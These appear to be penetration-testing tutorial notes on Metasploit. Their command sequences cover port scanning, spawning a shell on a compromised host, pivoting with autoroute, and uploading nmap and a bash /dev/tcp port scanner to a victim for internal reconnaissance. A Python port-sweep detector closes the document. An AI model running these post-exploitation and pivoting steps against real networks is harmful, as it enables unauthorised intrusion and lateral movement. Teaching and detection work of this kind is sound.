Auxiliary modules in Metasploit are used for tasks like scanning, discovery, and fuzzing. They can perform both TCP and UDP port scans and gather information from services like FTP, SSH, and HTTP. These modules are useful during both the information-gathering and post-exploitation phases of a penetration test. Once initial access is obtained, auxiliary modules can be used to discover hosts and scan ports on different network subnets. Their primary function is to extract information rather than exploit vulnerabilities directly.
Demo: Attacking, Pivoting, Discovery
Imagine you’re tasked with infiltrating a target network. Your first step is to use auxiliary modules to identify open ports on your initial target. After uncovering a vulnerable service, you exploit it, securing a foothold within the system. With this access, you pivot into a different network subnet, gaining a pathway to other systems. From there, you use auxiliary modules again to scan for open ports on a second target. How would you approach this plan?
Goals
Discover open ports on your first target.
Exploit the service running on the target to gain an initial foothold.
Use that foothold to pivot and access other systems on a different network subnet.
Scan for open ports on the second target using auxiliary modules.
Execution
# 1. Search for port scanning auxiliary modules
search portscan
# 2. Select the desired port scanning module by number or name from the search results
use number/name
# 3. Display options to configure the module
show options # To review the required and optional parameters for the module
# 4. Set the target IP address for port scanning
set RHOSTS [IP1] # Replace [IP1] with the target's IP address
# 5. Execute the port scan
run # Starts the port scanning process
# ---- Meterpreter Session: Post-exploitation ----
# 6. Open an interactive shell on the compromised machine
meterpreter > shell
# 7. Start an interactive bash shell on the remote target
/bin/bash -i # Interact with the target's shell
# 8. Check the network configuration to identify interfaces and candidate subnets for pivoting
ifconfig # View the network interfaces to see the available network subnets
exit # Leave the shell (repeat if a shell prompt remains) to return to the Meterpreter prompt
# ---- Pivoting: Accessing another network ----
# 9. Set up pivoting through the compromised machine to reach the network of the second target (IP2)
meterpreter > run autoroute -s [IP2] # Add a route to the new subnet through this session; -s takes the subnet, a bare IP gets the default 255.255.255.0 netmask
# 10. Return the Meterpreter session to the background so other commands can be run
background # Background the current session to continue scanning
# 11. List active Meterpreter sessions to resume if needed
sessions # Display the active sessions for further actions
# ---- Repeat for the second target (IP2) ----
# 12. Search for a port scanning auxiliary module again for the second target
search portscan
# 13. Use the selected module for port scanning
use number/name
# 14. Show the options to configure the new scan
show options
# 15. Set the RHOSTS to the IP address of the second target
set RHOSTS [IP2] # Replace [IP2] with the second target’s IP
# 16. Run the port scan on the second target
run # Start scanning the second target
autoroute: Sets up pivoting to access other subnets.
A network route is the path, or set of forwarding rules, that data packets follow to reach a destination across a network. In penetration testing, adding routes (e.g., with the autoroute command in Meterpreter) enables pivoting, where access to one compromised system allows interaction with other network segments through it.
Meterpreter sessions are interactive command-line interfaces that allow an attacker to control a compromised system after an exploit succeeds. These sessions provide access to various tools for further exploitation, privilege escalation, and post-exploitation activities like running commands, uploading/downloading files, or pivoting.
Alternative Post-Exploitation
Copying nmap to Victim 1
file /usr/bin/nmap # Check the binary type and architecture so the copy will run on the target
sessions -i 1 # Interact with Meterpreter session 1
upload /usr/bin/nmap /tmp/nmap # Upload the binary through the Meterpreter session
Copying a scanner to Victim 1
#!/bin/bash
# Bash-based TCP port scanner: tries ports 1-1000 on the host given as $1 via /dev/tcp
[ -z "$1" ] && { echo "usage: $0 <host>"; exit 1; }
for port in {1..1000}; do
  timeout 1 bash -c "echo >/dev/tcp/$1/$port" 2>/dev/null && echo "port $port is open"
done
upload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh # Upload the script through the Meterpreter session
shell # Drop to a system shell on the target; chmod and the script itself are not Meterpreter commands
cd /tmp
chmod +x ./bash-port-scanner.sh
./bash-port-scanner.sh [Victim2] # Replace [Victim2] with the second target's IP address
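The defender's view of the sweeps above, as an added example that is not part of the original notes: both the Metasploit portscan module and the /dev/tcp loop make one internal host touch many ports on one other internal host within a short window, and that is the pattern a connection-log detection looks for. The log format, IP addresses, timestamps and thresholds are constructed for the example.

```python
from collections import defaultdict, Counter

# Constructed connection records (not from any real network): each line is
# "<epoch_seconds> <src_ip> <dst_ip> <dst_port> <state>", in the style of a
# firewall or Zeek conn.log export. Ten routine HTTPS connections, then the
# foothold host (10.10.1.20) sweeping ports 1..40 on the second target one
# port per second, the traffic shape the /dev/tcp loop above produces.
NORMAL = [f"{1700000000 + 6 * i} 10.10.1.30 10.10.2.5 443 SF" for i in range(10)]
SWEEP = [f"{1700000030 + p} 10.10.1.20 10.10.2.5 {p} {'SF' if p in (22, 80) else 'REJ'}"
         for p in range(1, 41)]
SAMPLE_LOG = "\n".join(NORMAL + SWEEP)

def parse(log_text):
    """Yield (ts, src, dst, dport) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            yield int(parts[0]), parts[1], parts[2], int(parts[3])
        except ValueError:
            continue

def find_sweeps(log_text, window=60, min_ports=20):
    """Return one finding per (src, dst) pair that touched at least min_ports
    distinct destination ports within any window-second span, using a sliding
    two-pointer window over each pair's time-sorted records."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in parse(log_text):
        by_pair[(src, dst)].append((ts, dport))
    findings = []
    for (src, dst), recs in by_pair.items():
        recs.sort()
        in_window, left, best = Counter(), 0, (0, None, None)
        for ts, dport in recs:
            in_window[dport] += 1
            while ts - recs[left][0] > window:  # expire records older than the window
                in_window[recs[left][1]] -= 1
                if in_window[recs[left][1]] == 0:
                    del in_window[recs[left][1]]
                left += 1
            if len(in_window) > best[0]:
                best = (len(in_window), recs[left][0], ts)
        if best[0] >= min_ports:
            findings.append({"src": src, "dst": dst, "distinct_ports": best[0],
                             "start": best[1], "end": best[2]})
    return findings
```

Calling find_sweeps(SAMPLE_LOG) returns a single finding for 10.10.1.20 -> 10.10.2.5 with 40 distinct ports in 39 seconds, while the repeated HTTPS connections from 10.10.1.30 stay below the threshold; lower min_ports or widen window to trade false positives for sensitivity.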